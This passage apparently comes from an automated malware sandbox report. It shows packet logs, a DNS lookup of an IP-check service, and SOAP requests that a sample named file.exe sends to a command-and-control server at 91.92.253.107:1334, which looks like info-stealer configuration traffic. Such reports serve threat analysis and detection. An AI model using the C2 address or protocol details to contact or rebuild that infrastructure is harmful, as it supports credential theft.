Sep 5, 2024 20:25:31.656137943 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656147003 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656220913 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656229973 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656246901 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656330109 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656338930 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656346083 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656362057 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656512976 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656527996 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656537056 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656599998 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656614065 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656622887 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656651974 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656658888 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656680107 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656688929 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656708002 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656738997 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656747103 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656784058 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656791925 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656899929 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656908989 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656912088 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656954050 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656960964 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.656969070 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657057047 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657064915 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657094955 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657104015 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657164097 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657187939 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657195091 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657202959 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657282114 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657290936 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657294035 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657305002 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657452106 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657460928 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657464027 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657470942 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657479048 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657486916 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657552004 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657561064 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657586098 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657593012 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657681942 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657691002 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657699108 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657727957 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657764912 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657773972 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657804012 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657812119 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657886982 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657896042 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657974958 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657982111 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657984972 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.657989025 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658065081 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658075094 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658082962 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658090115 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658098936 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658159971 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658168077 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658174992 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658201933 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658379078 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658389091 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658396006 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658421040 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658492088 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658499956 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658509016 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658518076 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658587933 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658596039 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658605099 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658615112 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658704042 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658711910 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658718109 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658731937 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658807993 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658817053 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658823013 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658931017 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658940077 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658946991 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658956051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658963919 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.658972025 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659080982 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659089088 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659096003 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659105062 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659182072 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659190893 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659193993 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659202099 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659285069 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659292936 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659296989 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659303904 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659312010 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659321070 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659440994 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659459114 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659466982 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659476042 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659519911 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659528971 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659535885 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659544945 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659553051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659569025 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659600019 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659610033 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659622908 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659698009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659707069 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659809113 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659817934 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659826040 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659914017 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659921885 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.659949064 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660028934 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660037041 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660060883 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660089970 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660096884 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660131931 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660191059 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660198927 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660206079 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660257101 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660265923 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660296917 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660305023 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660373926 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660382986 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660389900 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660433054 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660440922 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660446882 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660463095 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660552025 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660559893 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660568953 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660589933 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660598993 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660633087 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660685062 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660692930 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660696030 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660717964 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660809994 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660818100 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660820961 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660844088 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660852909 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660914898 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.660923958 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661009073 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661017895 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661052942 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661061049 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661072016 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661083937 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661196947 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661206007 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661209106 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661216021 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661231041 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661238909 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661242008 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661250114 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661278009 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661286116 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661293983 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661309958 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661317110 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661355019 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661362886 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661370039 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661412954 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661421061 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661428928 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661449909 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661461115 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661525965 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661534071 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661536932 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661540985 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661545038 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661681890 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661691904 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661699057 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661708117 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661710978 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661714077 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661722898 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661819935 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661828041 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661835909 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661839962 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661847115 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661856890 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661864996 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661874056 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661886930 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661895990 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661902905 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661920071 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661926985 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661935091 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661942005 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661951065 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661958933 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661967993 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.661974907 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662054062 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662062883 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662069082 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662077904 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662081003 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662084103 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662094116 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662102938 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662111998 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662116051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662123919 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662177086 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662184954 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662192106 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662195921 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662203074 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662211895 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662220001 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662228107 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662231922 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662234068 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662241936 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662266970 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662275076 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662278891 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662281990 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662288904 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662297010 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.662303925 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.703773975 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:32.629164934 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:32.672234058 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:32.979829073 CEST	49733	1334	192.168.2.4	91.92.253.107

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 20:25:20.574471951 CEST	63013	53	192.168.2.4	1.1.1.1
Sep 5, 2024 20:26:00.524163961 CEST	53	62003	162.159.36.2	192.168.2.4
Sep 5, 2024 20:26:00.990633965 CEST	53	58513	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 5, 2024 20:25:20.574471951 CEST	192.168.2.4	1.1.1.1	0x8f6f	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 5, 2024 20:25:20.581598043 CEST	1.1.1.1	192.168.2.4	0x8f6f	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

91.92.253.107:1334

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	91.92.253.107	1334	7056	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 20:25:14.505373001 CEST	239	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 91.92.253.107:1334 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Sep 5, 2024 20:25:15.092840910 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 05 Sep 2024 18:25:14 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Sep 5, 2024 20:25:20.132107973 CEST	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 91.92.253.107:1334 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Sep 5, 2024 20:25:20.299477100 CEST	25	IN	HTTP/1.1 100 Continue
Sep 5, 2024 20:25:20.404280901 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 05 Sep 2024 18:25:20 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP 